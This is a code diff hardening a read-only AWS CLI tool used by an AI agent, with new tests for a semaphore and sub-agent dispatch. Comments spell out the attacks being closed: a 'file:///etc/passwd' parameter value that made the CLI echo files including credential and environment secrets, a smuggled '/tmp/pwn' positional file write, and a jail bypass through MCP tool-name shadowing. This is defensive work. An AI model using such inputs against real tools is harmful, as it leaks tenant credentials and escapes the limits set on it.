 import { AuditService } from '@/lib/audit-service';
+
+// Re-exported so the marker reads as part of this tool's contract; it lives in its
+// own module so subagent.ts can check it without importing the AWS SDK.
+export { SUBAGENT_READ_ONLY_TOOL, hasSubagentReadOnlyMarker } from './subagent-tool-marker';
 
 const execFileAsync = promisify(execFile);
 
@@ -74,10 +86,14 @@ export const ALLOWED_OPS: Record<string, ReadonlySet<string>> = {
         'describe-internet-gateways', 'describe-regions', 'describe-availability-zones',
         'describe-instance-types', 'describe-tags',
         'describe-instance-status', 'describe-vpc-endpoints', 'describe-flow-logs',
+        'describe-network-acls', 'describe-vpc-peering-connections', 'describe-transit-gateways',
         // NOT describe-instance-attribute: --attribute userData returns the instance's
         // user-data script, which routinely carries bootstrap credentials. Permanently out.
     ]),
-    rds: new Set(['describe-db-instances', 'describe-db-clusters', 'describe-db-snapshots', 'describe-db-cluster-snapshots']),
+    rds: new Set([
+        'describe-db-instances', 'describe-db-clusters', 'describe-db-snapshots',
+        'describe-db-cluster-snapshots', 'describe-db-subnet-groups', 'describe-events',
+    ]),
     elbv2: new Set([
         'describe-load-balancers', 'describe-target-groups', 'describe-target-health',
         'describe-listeners', 'describe-rules',
@@ -94,19 +110,41 @@ export const ALLOWED_OPS: Record<string, ReadonlySet<string>> = {
     s3api: new Set([
         'list-buckets', 'get-bucket-location', 'get-bucket-tagging', 'get-bucket-encryption',
         'get-bucket-versioning', 'get-bucket-policy', 'get-bucket-acl', 'get-public-access-block',
-        'get-bucket-logging', 'list-objects-v2',
+        'get-bucket-logging', 'list-objects-v2', 'list-object-versions',
+        'get-bucket-lifecycle-configuration',
         // NOT get-object: its outfile is a POSITIONAL, i.e. an arbitrary local file write.
     ]),
-    cloudwatch: new Set(['get-metric-statistics', 'get-metric-data', 'list-metrics', 'describe-alarms']),
-    logs: new Set(['describe-log-groups', 'describe-log-streams', 'filter-log-events', 'get-log-events']),
+    cloudwatch: new Set([
+        'get-metric-statistics', 'get-metric-data', 'list-metrics', 'describe-alarms',
+        'describe-alarm-history',
+    ]),
+    logs: new Set([
+        'describe-log-groups', 'describe-log-streams', 'filter-log-events', 'get-log-events',
+        // start-query reads: it submits a Logs Insights query over existing log data and
+        // returns a query id. Despite the "start-" prefix it creates no durable resource
+        // and mutates nothing; get-query-results collects the rows.
+        'start-query', 'get-query-results',
+    ]),
     cloudformation: new Set(['list-stacks', 'describe-stacks', 'describe-stack-resources']),
     cloudtrail: new Set(['lookup-events']),
     iam: new Set([
         'list-roles', 'list-policies', 'get-role', 'get-policy', 'list-attached-role-policies',
         'get-policy-version', 'list-role-policies', 'get-role-policy', 'list-users',
-        'list-attached-user-policies',
-        // NOT get-credential-report.
+        'list-attached-user-policies', 'get-user', 'list-user-policies', 'get-user-policy',
+        'list-access-keys', 'list-mfa-devices', 'get-account-summary',
+        'get-account-password-policy', 'list-groups',
+        // NOT get-credential-report. list-access-keys returns key IDs and status only —
+        // never the secret, which AWS does not expose through any API.
     ]),
+    // Compliance and security-posture reads. Findings can be verbose but carry no
+    // credentials; every entry here is a list/describe/get over existing findings.
+    config: new Set([
+        'describe-config-rules', 'describe-compliance-by-config-rule',
+        'get-compliance-details-by-config-rule',
+    ]),
+    guardduty: new Set(['list-detectors', 'list-findings', 'get-findings']),
+    securityhub: new Set(['get-findings', 'describe-hub']),
+    accessanalyzer: new Set(['list-analyzers', 'list-findings']),
     organizations: new Set(['list-accounts', 'describe-organization', 'list-accounts-for-parent', 'list-tags-for-resource']),
     acm: new Set(['list-certificates', 'describe-certificate']),
     kms: new Set(['list-keys', 'describe-key', 'list-aliases']),
@@ -121,11 +159,114 @@ export const ALLOWED_OPS: Record<string, ReadonlySet<string>> = {
 };
 
 /**
- * Permitted flags and how many values each consumes.
- *  - 'none' — a boolean flag. Value MUST be `true`; the flag is emitted alone, so
- *    no value token exists to be mistaken for a positional.
- *  - 'one'  — exactly one value.
- *  - 'many' — one or more values (e.g. --instance-ids i-1 i-2).
+ * THE VALUE AXIS. Arity and the flag allowlist together fix WHICH tokens argv may
+ * contain and WHERE; neither says anything about what a value may CONTAIN, and the
+ * only content rule used to be a denylist ("must not start with `-`"). That was
+ * escaped: the AWS CLI dereferences a `file://` prefix on every SERVICE parameter,
+ * reads the target, and on a JSON parse failure echoes the FULL file contents in its
+ * error — which this tool returns to the model verbatim. Measured:
+ *
+ *     { service: 'ce', operation: 'get-cost-and-usage',
+ *       params: { '--time-period': 'file:///etc/passwd' } }
+ *
+ * turned into `Error parsing parameter '--time-period': Invalid JSON:` followed by
+ * the file. In the ECS task the reachable targets are the tenant credentials file
+ * (live STS credentials for every assumed customer role) and /proc/1/environ
+ * (DATABASE_URL, NEXTAUTH_SECRET, COGNITO_APP_CLIENT_SECRET). `fileb://` is the same
+ * handler; `http(s)://` differs only by `cli_follow_urlparam`, a config default we
+ * inherit rather than enforce (see buildCommandEnv, which now pins AWS_CONFIG_FILE).
+ *
+ * A denylist over a parser nobody enumerated is the same structural mistake that
+ * argparse's `allow_abbrev` already punished twice. So every flag now declares the
+ * SHAPE its values must MATCH, and a value is refused unless it matches. The shapes
+ * are chosen so that **no shape can match a leading URI scheme**:
+ *
+ *  - id / name / timestamp / int / token contain no ":" at all;
+ *  - code allows ":" but no segment may contain "/";
+ *  - arn must begin with the literal "arn:";
+ *  - filter must contain "=" before any "/", or be a JSON document;
+ *  - jmespath contains no "/";
+ *  - expr (free-text query bodies, which genuinely need both ":" and "/") carries
+ *    the scheme exclusion in its own pattern.
+ *
+ * That property is asserted over every shape in the tests, and the standalone scheme
+ * check in validateAwsReadRequest is a redundant backstop, not the mechanism.
+ */
+export type ValueShape =
+    | 'id' | 'name' | 'code' | 'arn' | 'filter'
+    | 'jmespath' | 'expr' | 'timestamp' | 'int' | 'token';
+
+/** `Name=k,Values=v1,v2` shorthand — a key, "=", then values. */
+const SHORTHAND = /^[A-Za-z0-9:._-]+=[A-Za-z0-9:._*\/, +-]*(,[A-Za-z0-9:._-]+=[A-Za-z0-9:._*\/, +-]*)*$/;
+
+export const VALUE_SHAPES: Record<ValueShape, (v: string) => boolean> = {
+    /** Resource identifiers, bucket names, log-group names. No ":" — so no scheme. */
+    id: v => /^[A-Za-z0-9\/][A-Za-z0-9._\/-]*$/.test(v),
+    /**
+     * Human-ish names: security groups, log streams (`2026/07/26/[$LATEST]abc`),
+     * S3 prefixes, namespaces. Spaces and brackets allowed; ":" is not.
+     */
+    name: v => /^[A-Za-z0-9\/][A-Za-z0-9 ._\/\[\]$*@+=,-]*$/.test(v),
+    /**
+     * API enum values and colon-qualified type codes (`RUNNING`, `ec2:instance`,
+     * `tag:env`). Colons separate segments; no segment may contain "/", so "://"
+     * is unrepresentable.
+     */
+    code: v => /^[A-Za-z0-9][A-Za-z0-9._-]*(:[A-Za-z0-9._*-]*)*$/.test(v),
+    /**
+     * An ARN, or the bare identifier the same API accepts in its place
+     * (`--cluster prod`, `--key-id alias/aws/s3`). Both alternatives are anchored.
+     */
+    arn: v => /^arn:[A-Za-z0-9-]*:[A-Za-z0-9-]*:[A-Za-z0-9-]*:[0-9]*:[A-Za-z0-9._\/:+=@-]+$/.test(v)
+        || VALUE_SHAPES.id(v),
+    /**
+     * Structured parameters: `Name=…,Values=…` shorthand, or a JSON document. The
+     * JSON branch demands a leading "[" or "{" AND that it actually parses, which is
+     * a positive test rather than a prefix guess.
+     */
+    filter: v => SHORTHAND.test(v) || (/^[\[{]/.test(v) && jsonParses(v)),
+    /**
+     * JMESPath: `Reservations[?State.Name=='running'].[InstanceId,Tags[?Key=='Name']]`.
+     * Needs "?", quotes, braces and ":" (slices, multiselect hashes); deliberately no
+     * "/", which is what keeps a scheme unrepresentable.
+     */
+    jmespath: v => /^[A-Za-z0-9_.\[\]|*()@'"?{}!=<>&,$: `-]+$/.test(v),
+    /**
+     * Free-text query bodies that genuinely need both ":" and "/" — CloudWatch Logs
+     * filter patterns (`{ $.errorCode = "*Unauthorized*" }`) and Logs Insights query
+     * strings (`fields @message | filter @message like /ERROR/`). Printable text that
+     * does not BEGIN with a URI scheme; the CLI only expands a scheme at position 0.
+     */
+    expr: v => /^(?![A-Za-z][A-Za-z0-9+.-]*:\/\/)[^\x00-\x1f]+$/.test(v),
+    /** ISO-8601, or epoch seconds/milliseconds. */
+    timestamp: v => /^([0-9]{4}-[0-9]{2}-[0-9]{2}([T ][0-9:.+Z-]*)?|[0-9]{1,19})$/.test(v),
+    int: v => /^[0-9]{1,10}$/.test(v),
+    /** Opaque pagination tokens — base64url and friends. No ":". */
+    token: v => /^[A-Za-z0-9+\/=_.-]+$/.test(v),
+};
+
+function jsonParses(v: string): boolean {
+    try { JSON.parse(v); return true; } catch { return false; }
+}
+
+interface FlagSpec {
+    /**
+     *  - 'none' — a boolean flag. Value MUST be `true`; the flag is emitted alone, so
+     *    no value token exists to be mistaken for a positional.
+     *  - 'one'  — exactly one value.
+     *  - 'many' — one or more values (e.g. --instance-ids i-1 i-2).
+     */
+    arity: 'none' | 'one' | 'many';
+    /** Omitted only for 'none', which has no value to shape. */
+    shape?: ValueShape;
+}
+
+const none: FlagSpec = { arity: 'none' };
+const one = (shape: ValueShape): FlagSpec => ({ arity: 'one', shape });
+const many = (shape: ValueShape): FlagSpec => ({ arity: 'many', shape });
+
+/**
+ * Permitted flags, each with its arity and the shape its values must match.
  *
  * --profile, --region and --output are deliberately absent: the builder supplies
  * them from validated fields, and allowing them here would let a later duplicate
@@ -138,135 +279,165 @@ export const ALLOWED_OPS: Record<string, ReadonlySet<string>> = {
  * uselessness that pushes users back toward a shell. Nothing here changes WHERE the
  * CLI connects, WHAT credentials it uses, or WHERE it writes.
  */
-export const ALLOWED_FLAGS: Record<string, 'none' | 'one' | 'many'> = {
+export const ALLOWED_FLAGS: Record<string, FlagSpec> = {
     // Filters, queries and pagination (cross-service)
-    '--filters': 'many',
-    '--filter': 'many',
-    '--query': 'one',
-    '--max-items': 'one',
-    '--max-results': 'one',
-    '--max-keys': 'one',
-    '--limit': 'one',
-    '--starting-token': 'one',
-    '--continuation-token': 'one',
-    '--page-size': 'one',
-    '--no-paginate': 'none',
-    '--include-deleted': 'none',
+    '--filters': many('filter'),
+    '--filter': many('filter'),
+    '--query': one('jmespath'),
+    '--max-items': one('int'),
+    '--max-results': one('int'),
+    '--max-keys': one('int'),
+    '--limit': one('int'),
+    '--starting-token': one('token'),
+    '--continuation-token': one('token'),
+    '--next-page-token': one('token'),
+    '--page-size': one('int'),
+    '--no-paginate': none,
+    '--include-deleted': none,
 
     // EC2
-    '--instance-ids': 'many',
-    '--instance-types': 'many',
-    '--volume-ids': 'many',
-    '--snapshot-ids': 'many',
-    '--owner-ids': 'many',
-    '--owners': 'many',
-    '--image-ids': 'many',
-    '--group-ids': 'many',
-    '--group-names': 'many',
-    '--vpc-ids': 'many',
-    '--subnet-ids': 'many',
-    '--route-table-ids': 'many',
-    '--network-interface-ids': 'many',
-    '--nat-gateway-ids': 'many',
-    '--internet-gateway-ids': 'many',
-    '--vpc-endpoint-ids': 'many',
-    '--flow-log-ids': 'many',
-    '--allocation-ids': 'many',
-    '--public-ips': 'many',
-    '--region-names': 'many',
-    '--zone-names': 'many',
-    '--include-all-instances': 'none',
+    '--instance-ids': many('id'),
+    '--instance-types': many('id'),
+    '--volume-ids': many('id'),
+    '--snapshot-ids': many('id'),
+    '--owner-ids': many('id'),
+    '--owners': many('id'),
+    '--image-ids': many('id'),
+    '--group-ids': many('id'),
+    '--group-names': many('name'),
+    '--vpc-ids': many('id'),
+    '--subnet-ids': many('id'),
+    '--route-table-ids': many('id'),
+    '--network-interface-ids': many('id'),
+    '--nat-gateway-ids': many('id'),
+    '--internet-gateway-ids': many('id'),
+    '--vpc-endpoint-ids': many('id'),
+    '--flow-log-ids': many('id'),
+    '--allocation-ids': many('id'),
+    '--public-ips': many('id'),
+    '--region-names': many('id'),
+    '--zone-names': many('id'),
+    '--network-acl-ids': many('id'),
+    '--vpc-peering-connection-ids': many('id'),
+    '--transit-gateway-ids': many('id'),
+    '--include-all-instances': none,
 
     // RDS
-    '--db-instance-identifier': 'one',
-    '--db-cluster-identifier': 'one',
-    '--db-snapshot-identifier': 'one',
-    '--snapshot-type': 'one',
+    '--db-instance-identifier': one('id'),
+    '--db-cluster-identifier': one('id'),
+    '--db-snapshot-identifier': one('id'),
+    '--db-subnet-group-name': one('id'),
+    '--snapshot-type': one('code'),
+    '--source-identifier': one('id'),
+    '--source-type': one('code'),
+    '--event-categories': many('name'),
+    '--duration': one('int'),
 
     // ELBv2
-    '--load-balancer-arn': 'one',
-    '--load-balancer-arns': 'many',
-    '--target-group-arn': 'one',
-    '--target-group-arns': 'many',
-    '--listener-arn': 'one',
-    '--listener-arns': 'many',
-    '--rule-arns': 'many',
+    '--load-balancer-arn': one('arn'),
+    '--load-balancer-arns': many('arn'),
+    '--target-group-arn': one('arn'),
+    '--target-group-arns': many('arn'),
+    '--listener-arn': one('arn'),
+    '--listener-arns': many('arn'),
+    '--rule-arns': many('arn'),
 
     // Auto Scaling / ECS / EKS
-    '--auto-scaling-group-names': 'many',
-    '--cluster': 'one',
-    '--clusters': 'many',
-    '--cluster-name': 'one',
-    '--nodegroup-name': 'one',
-    '--service': 'one',
-    '--services': 'many',
-    '--tasks': 'many',
-    '--name': 'one',
-    '--names': 'many',
+    '--auto-scaling-group-names': many('name'),
+    '--cluster': one('arn'),
+    '--clusters': many('arn'),
+    '--cluster-name': one('id'),
+    '--nodegroup-name': one('id'),
+    '--service': one('arn'),
+    '--services': many('arn'),
+    '--tasks': many('arn'),
+    '--name': one('id'),
+    '--names': many('name'),
 
     // Lambda
-    '--function-name': 'one',
-    '--qualifier': 'one',
+    '--function-name': one('arn'),
+    '--qualifier': one('id'),
 
     // S3 (s3api)
-    '--bucket': 'one',
-    '--prefix': 'one',
-    '--delimiter': 'one',
+    '--bucket': one('id'),
+    '--prefix': one('name'),
+    '--delimiter': one('name'),
+    '--key-marker': one('name'),
+    '--version-id-marker': one('token'),
 
     // CloudWatch
-    '--metric-name': 'one',
-    '--metric': 'one',
-    '--namespace': 'one',
-    '--dimensions': 'many',
-    '--statistics': 'many',
-    '--period': 'one',
-    '--metric-data-queries': 'many',
-    '--scan-by': 'one',
-    '--alarm-names': 'many',
-    '--state-value': 'one',
+    '--metric-name': one('name'),
+    '--metric': one('name'),
+    '--namespace': one('name'),
+    '--dimensions': many('filter'),
+    '--statistics': many('code'),
+    '--period': one('int'),
+    '--metric-data-queries': many('filter'),
+    '--scan-by': one('code'),
+    '--alarm-names': many('name'),
+    '--alarm-name': one('name'),
+    '--history-item-type': one('code'),
+    '--state-value': one('code'),
+    '--start-date': one('timestamp'),
+    '--end-date': one('timestamp'),
 
     // Logs / CloudTrail
-    '--log-group-name': 'one',
-    '--log-group-name-prefix': 'one',
-    '--log-stream-name': 'one',
-    '--log-stream-names': 'many',
-    '--filter-pattern': 'one',
-    '--start-from-head': 'none',
-    '--lookup-attributes': 'many',
+    '--log-group-name': one('id'),
+    '--log-group-names': many('id'),
+    '--log-group-identifiers': many('arn'),
+    '--log-group-name-prefix': one('id'),
+    '--log-stream-name': one('name'),
+    '--log-stream-names': many('name'),
+    '--filter-pattern': one('expr'),
+    '--query-string': one('expr'),
+    '--query-id': one('id'),
+    '--start-from-head': none,
+    '--lookup-attributes': many('filter'),
 
     // CloudFormation
-    '--stack-name': 'one',
+    '--stack-name': one('id'),
 
     // IAM
-    '--role-name': 'one',
-    '--user-name': 'one',
-    '--policy-arn': 'one',
-    '--policy-name': 'one',
-    '--version-id': 'one',
-    '--path-prefix': 'one',
+    '--role-name': one('id'),
+    '--user-name': one('id'),
+    '--policy-arn': one('arn'),
+    '--policy-name': one('id'),
+    '--version-id': one('id'),
+    '--path-prefix': one('name'),
 
     // Organizations / ACM / KMS / Route 53
-    '--parent-id': 'one',
-    '--resource-id': 'one',
-    '--certificate-arn': 'one',
-    '--certificate-statuses': 'many',
-    '--key-id': 'one',
-    '--hosted-zone-id': 'one',
-    '--start-record-name': 'one',
+    '--parent-id': one('id'),
+    '--resource-id': one('arn'),
+    '--certificate-arn': one('arn'),
+    '--certificate-statuses': many('code'),
+    '--key-id': one('arn'),
+    '--hosted-zone-id': one('id'),
+    '--start-record-name': one('name'),
+
+    // Config / GuardDuty / Security Hub / IAM Access Analyzer
+    '--config-rule-names': many('name'),
+    '--config-rule-name': one('name'),
+    '--compliance-types': many('code'),
+    '--detector-id': one('id'),
+    '--finding-ids': many('id'),
+    '--finding-criteria': one('filter'),
+    '--analyzer-arn': one('arn'),
+    '--hub-arn': one('arn'),
+    '--type': one('code'),
 
     // Time windows and Cost Explorer
-    '--start-time': 'one',
-    '--end-time': 'one',
-    '--time-period': 'one',
-    '--granularity': 'one',
-    '--metrics': 'many',
-    '--group-by': 'many',
-    '--dimension': 'one',
-    '--search-string': 'one',
+    '--start-time': one('timestamp'),
+    '--end-time': one('timestamp'),
+    '--time-period': one('filter'),
+    '--granularity': one('code'),
+    '--metrics': many('code'),
+    '--group-by': many('filter'),
+    '--dimension': one('code'),
+    '--search-string': one('name'),
 
     // Resource Groups Tagging
-    '--resource-type-filters': 'many',
-    '--tag-filters': 'many',
+    '--resource-type-filters': many('code'),
+    '--tag-filters': many('filter'),
 };
 
 export type ParamValue = string | string[] | true;
@@ -320,17 +491,18 @@ export function validateAwsReadRequest(input: AwsReadRequest): string | null {
     }
 
     for (const [flag, value] of Object.entries(input.params ?? {})) {
-        const arity = own(ALLOWED_FLAGS, flag);
-        if (!arity) return `parameter "${flag}" is not a permitted flag`;
+        const spec = own(ALLOWED_FLAGS, flag);
+        if (!spec) return `parameter "${flag}" is not a permitted flag`;
 
-        if (arity === 'none') {
+        if (spec.arity === 'none') {
             // A value here is exactly the positional-smuggling vector.
             if (value !== true) return `parameter "${flag}" takes no value — pass true`;
             continue;
         }
         const values = Array.isArray(value) ? value : [value];
         if (values.length === 0) return `parameter "${flag}" requires a value`;
-        if (arity === 'one' && values.length !== 1) return `parameter "${flag}" takes exactly one value`;
+        if (spec.arity === 'one' && values.length !== 1) return `parameter "${flag}" takes exactly one value`;
+        const shape = spec.shape ?? 'id';
         for (const v of values) {
             if (typeof v !== 'string' || v.length === 0) return `parameter "${flag}" values must be non-empty strings`;
             // The argv invariant. A 'many' flag emits each element as its own
@@ -339,6 +511,21 @@ export function validateAwsReadRequest(input: AwsReadRequest): string | null {
             // axis it does not constrain.
             if (v.startsWith('-')) {
                 return `parameter "${flag}" values must not begin with "-" (a value starting with a dash would be parsed as a flag)`;
+            }
+            // The AWS CLI dereferences file://, fileb:// and (when
+            // cli_follow_urlparam is enabled) http(s):// on every SERVICE parameter,
+            // reads the target, and echoes its contents in the parse error — which
+            // this tool returns verbatim to the model. No shape below can match a
+            // scheme either; this is the redundant backstop, stated explicitly so a
+            // future shape cannot quietly re-open it.
+            if (/^[A-Za-z][A-Za-z0-9+.-]*:\/\//.test(v)) {
+                return `parameter "${flag}" values must not carry a URI scheme (the AWS CLI would dereference it and echo the contents)`;
+            }
+            // Positive validation: the value must MATCH the declared shape. Anything
+            // the shape does not describe is refused, rather than anything a denylist
+            // happened to enumerate.
+            if (!VALUE_SHAPES[shape](v)) {
+                return `parameter "${flag}" value does not match the expected ${shape} form`;
             }
         }
     }
@@ -349,24 +536,42 @@ export function validateAwsReadRequest(input: AwsReadRequest): string | null {
  * Build argv. Exported so tests can assert the exact array without executing.
  * Every emitted token is either a flag or a value belonging to a flag of declared
  * non-zero arity — so a positional argument cannot be produced.
+ *
+ * That property is enforced HERE, not assumed: the builder is exported and
+ * independently callable, and it used to emit whatever it was handed — an unknown
+ * key became a positional (`{'--bucket': ['b', '/tmp/pwn']}` emitted `/tmp/pwn` as
+ * `s3api get-object`'s outfile) whenever a caller skipped validation. Arity is now
+ * applied to the OUTPUT: unknown flags are dropped, a zero-arity flag emits the flag
+ * alone, and a 'one' flag emits at most one value, whatever the input says.
  */
 export function buildAwsReadArgv(input: AwsReadRequest): string[] {
     const argv = [input.service, input.operation];
     if (input.region) argv.push('--region', input.region);
     if (input.profile) argv.push('--profile', input.profile);
     for (const [flag, value] of Object.entries(input.params ?? {})) {
-        // own(): the builder is exported and independently callable, and "cannot
-        // emit a positional" must hold on its own rather than by trusting its
-        // caller to have validated first.
-        if (own(ALLOWED_FLAGS, flag) === 'none') { argv.push(flag); continue; }
-        argv.push(flag, ...(Array.isArray(value) ? value : [value as string]));
+        // own(): a bare index would read an arity off Object.prototype
+        // ('constructor' → the Object constructor, which is not 'none').
+        const spec = own(ALLOWED_FLAGS, flag);
+        if (!spec) continue;                                  // not a flag → cannot become a positional
+        if (spec.arity === 'none') { argv.push(flag); continue; }
+
+        const values = (Array.isArray(value) ? value : [value]).filter(
+            (v): v is string => typeof v === 'string' && v.length > 0,
+        );
+        const emitted = spec.arity === 'one' ? values.slice(0, 1) : values;
+        if (emitted.length === 0) continue;                   // a lone flag with no value would consume the next token
+        argv.push(flag, ...emitted);
     }
     argv.push('--output', 'json');
     return argv;
 }
 
 export function createAwsReadTool(tenantId: string, userId?: string) {
-    return tool(
+    // markSubagentReadOnlyTool: the sub-agent jail exempts this tool by IDENTITY.
+    // Exempting it by the string "aws_read" let any tool that merely claimed the name
+    // through — remote MCP tool names are unprefixed, so a tenant-configured MCP
+    // server could both bypass the jail and shadow the real tool.
+    return markSubagentReadOnlyTool(tool(
         async (input: AwsReadRequest): Promise<string> => {
             const error = validateAwsReadRequest(input);
             if (error) return `REFUSED: ${error}`;
@@ -415,7 +620,9 @@ export function createAwsReadTool(tenantId: string, userId?: string) {
             name: 'aws_read',
             description: `Run a permitted READ-ONLY AWS CLI operation. This is your only route to AWS — you have no shell.
 
-Give the service and operation separately; never write a command line. Parameters are a map of flag to value, where a value is a string, an array of strings for multi-value flags, or true for flags that take no value. A value may not begin with "-".
+Give the service and operation separately; never write a command line. Parameters are a map of flag to value, where a value is a string, an array of strings for multi-value flags, or true for flags that take no value.
+
+Values must be plain AWS values — resource ids, names, ARNs, Name=…,Values=… filters, JMESPath expressions, ISO timestamps or epoch seconds. A value may not begin with "-" and may not carry a URI scheme (no file://, http://): a parameter is never a path or a URL to be fetched.
 
 Example:
 { "service": "ec2", "operation": "describe-instances", "region": "us-east-1", "profile": "nucleus_agent_...", "params": { "--instance-ids": ["i-1", "i-2"], "--no-paginate": true } }
@@ -431,5 +638,5 @@ Only an explicit allowlist of services and operations is permitted. If you need 
                     .describe('Flags: string, string[] for multi-value, or true for valueless flags'),
             }),
         },
-    );
+    ));
 }

--- a/apps/web-ui/lib/agent/concurrency.test.ts
+++ b/apps/web-ui/lib/agent/concurrency.test.ts
@@ -1,0 +1,56 @@
+import { describe, it, expect } from 'vitest';
+import { Semaphore } from './concurrency';
+
+const defer = () => {
+    let resolve!: () => void;
+    const promise = new Promise<void>(r => { resolve = r; });
+    return { promise, resolve };
+};
+
+describe('Semaphore', () => {
+    it('never runs more than `limit` tasks at once', async () => {
+        const sem = new Semaphore(2);
+        let active = 0;
+        let peak = 0;
+
+        const task = async () => sem.run(async () => {
+            active++;
+            peak = Math.max(peak, active);
+            await new Promise(r => setTimeout(r, 5));
+            active--;
+        });
+
+        await Promise.all(Array.from({ length: 10 }, task));
+
+        expect(peak).toBe(2);
+        expect(active).toBe(0);
+    });
+
+    it('releases the slot when a task throws', async () => {
+        const sem = new Semaphore(1);
+
+        await expect(sem.run(async () => { throw new Error('boom'); })).rejects.toThrow('boom');
+
+        // If the slot leaked, this would hang rather than resolve.
+        await expect(sem.run(async () => 'ok')).resolves.toBe('ok');
+    });
+
+    it('queues callers beyond the limit and runs them as slots free', async () => {
+        const sem = new Semaphore(1);
+        const first = defer();
+        const order: string[] = [];
+
+        const a = sem.run(async () => { order.push('a-start'); await first.promise; order.push('a-end'); });
+        const b = sem.run(async () => { order.push('b-start'); });
+
+        expect(order).toEqual(['a-start']);
+        first.resolve();
+        await Promise.all([a, b]);
+        expect(order).toEqual(['a-start', 'a-end', 'b-start']);
+    });
+
+    it('treats a limit below 1 as 1', async () => {
+        const sem = new Semaphore(0);
+        await expect(sem.run(async () => 'ok')).resolves.toBe('ok');
+    });
+});

--- a/apps/web-ui/lib/agent/concurrency.ts
+++ b/apps/web-ui/lib/agent/concurrency.ts
@@ -1,0 +1,45 @@
+/**
+ * Minimal counting semaphore.
+ *
+ * Once the executor is allowed to emit many tool calls in one turn, ToolNode
+ * runs them all concurrently. That is the point — but execute_command spawns a
+ * real subprocess per call, so an unbounded 45-call turn would fork 45 shells
+ * inside the web-ui container. This bounds that specific blast radius.
+ */
+export class Semaphore {
+    private available: number;
+    private readonly waiters: Array<() => void> = [];
+
+    constructor(limit: number) {
+        this.available = Math.max(1, Math.floor(limit));
+    }
+
+    async run<T>(fn: () => Promise<T>): Promise<T> {
+        // Deliberately NOT `await this.acquire()` here: awaiting any promise —
+        // even one already resolved — yields a microtask before continuing, so
+        // a caller that finds a free slot would still run `fn` one tick late.
+        // Callers (and this file's own tests) rely on a free slot starting
+        // `fn` synchronously within the `run()` call.
+        if (this.available > 0) {
+            this.available--;
+        } else {
+            await new Promise<void>(resolve => this.waiters.push(resolve));
+        }
+        try {
+            return await fn();
+        } finally {
+            this.release();
+        }
+    }
+
+    private release(): void {
+        const next = this.waiters.shift();
+        if (next) {
+            // Hand the slot straight to the next waiter — do not increment, or a
+            // third caller could take the slot we just promised away.
+            next();
+            return;
+        }
+        this.available++;
+    }
+}

--- a/apps/web-ui/lib/agent/dispatch-agent-tool.test.ts
+++ b/apps/web-ui/lib/agent/dispatch-agent-tool.test.ts
@@ -1,0 +1,140 @@
+import { describe, it, expect, vi, beforeEach } from 'vitest';
+
+vi.mock('./subagent', async (importOriginal) => {
+    const actual = await importOriginal<typeof import('./subagent')>();
+    return { ...actual, runSubagent: vi.fn() };
+});
+
+import { runSubagent } from './subagent';
+import { createRunBudgetLedger, createDispatchAgentTool } from './dispatch-agent-tool';
+
+const BUDGET = {
+    enabled: true,
+    maxConcurrentSubagents: 2,
+    maxSubagentsPerRun: 3,
+    maxSubagentTokensPerRun: 1000,
+    subagentMaxIterations: 4,
+    subagentTimeoutMs: 5000,
+};
+
+const okResult = {
+    report: 'Findings: i-123 idle', toolCount: 2, tokensIn: 300, tokensOut: 50,
+    status: 'done' as const, transcript: [],
+};
+
+beforeEach(() => {
+    vi.clearAllMocks();
+    vi.mocked(runSubagent).mockResolvedValue(okResult);
+});
+
+describe('createRunBudgetLedger', () => {
+    it('allows reservations up to maxSubagentsPerRun', () => {
+        const ledger = createRunBudgetLedger(BUDGET);
+        expect(ledger.tryReserve().ok).toBe(true);
+        expect(ledger.tryReserve().ok).toBe(true);
+        expect(ledger.tryReserve().ok).toBe(true);
+
+        const fourth = ledger.tryReserve();
+        expect(fourth.ok).toBe(false);
+        expect((fourth as { reason: string }).reason).toMatch(/per-run sub-agent limit/i);
+    });
+
+    it('refuses once the token budget is spent', () => {
+        const ledger = createRunBudgetLedger(BUDGET);
+        ledger.recordSpend(900, 200);
+
+        const verdict = ledger.tryReserve();
+        expect(verdict.ok).toBe(false);
+        expect((verdict as { reason: string }).reason).toMatch(/token budget/i);
+    });
+
+    it('refuses everything when the budget is disabled', () => {
+        const ledger = createRunBudgetLedger({ ...BUDGET, enabled: false });
+        expect(ledger.tryReserve().ok).toBe(false);
+    });
+});
+
+describe('dispatch_agent tool', () => {
+    const makeTool = (budget = BUDGET) => createDispatchAgentTool({
+        model: {},
+        subagentTools: [{ name: 'describe_instances', invoke: async () => 'ok' }],
+        ledger: createRunBudgetLedger(budget),
+        budget,
+    });
+
+    it('returns the sub-agent report', async () => {
+        const result = await makeTool().invoke({
+            role: 'EC2 auditor', task: 'audit account 1', expectedOutput: 'idle instances',
+        });
+        expect(result).toContain('i-123 idle');
+    });
+
+    it('returns ONLY the report — raw sub-agent tool output never reaches the orchestrator', async () => {
+        // The tool's return value becomes a ToolMessage in the orchestrator's
+        // message list. If the transcript leaked into it, context isolation — the
+        // entire reason sub-agents exist — would be defeated.
+        vi.mocked(runSubagent).mockResolvedValue({
+            ...okResult,
+            transcript: [
+                { kind: 'tool', name: 'describe_instances', text: 'RAW_TOOL_DUMP_MARKER' },
+                { kind: 'ai', text: 'INTERNAL_REASONING_MARKER' },
+            ],
+        });
+
+        const result = await makeTool().invoke({ role: 'a', task: 't', expectedOutput: 'e' });
+
+        expect(result).toBe(okResult.report);
+        expect(result).not.toContain('RAW_TOOL_DUMP_MARKER');
+        expect(result).not.toContain('INTERNAL_REASONING_MARKER');
+    });
+
+    it('degrades gracefully instead of throwing when the budget is exhausted', async () => {
+        const tool = makeTool({ ...BUDGET, maxSubagentsPerRun: 1 });
+        await tool.invoke({ role: 'a', task: 't', expectedOutput: 'e' });
+
+        const second = await tool.invoke({ role: 'b', task: 't', expectedOutput: 'e' });
+        expect(second).toMatch(/perform this work yourself/i);
+        expect(runSubagent).toHaveBeenCalledTimes(1);
+    });
+
+    it('emits running then done events', async () => {
+        const events: Array<{ status: string }> = [];
+        const budget = BUDGET;
+        const tool = createDispatchAgentTool({
+            model: {},
+            subagentTools: [],
+            ledger: createRunBudgetLedger(budget),
+            budget,
+            onSubagentEvent: e => events.push({ status: e.status }),
+        });
+
+        await tool.invoke({ role: 'a', task: 't', expectedOutput: 'e' });
+
+        expect(events[0].status).toBe('running');
+        expect(events[events.length - 1].status).toBe('done');
+    });
+
+    it('never throws when the sub-agent runtime rejects', async () => {
+        vi.mocked(runSubagent).mockRejectedValue(new Error('unexpected'));
+        const result = await makeTool().invoke({ role: 'a', task: 't', expectedOutput: 'e' });
+        expect(result).toMatch(/unexpected/);
+    });
+
+    it('bounds concurrency to maxConcurrentSubagents', async () => {
+        let active = 0;
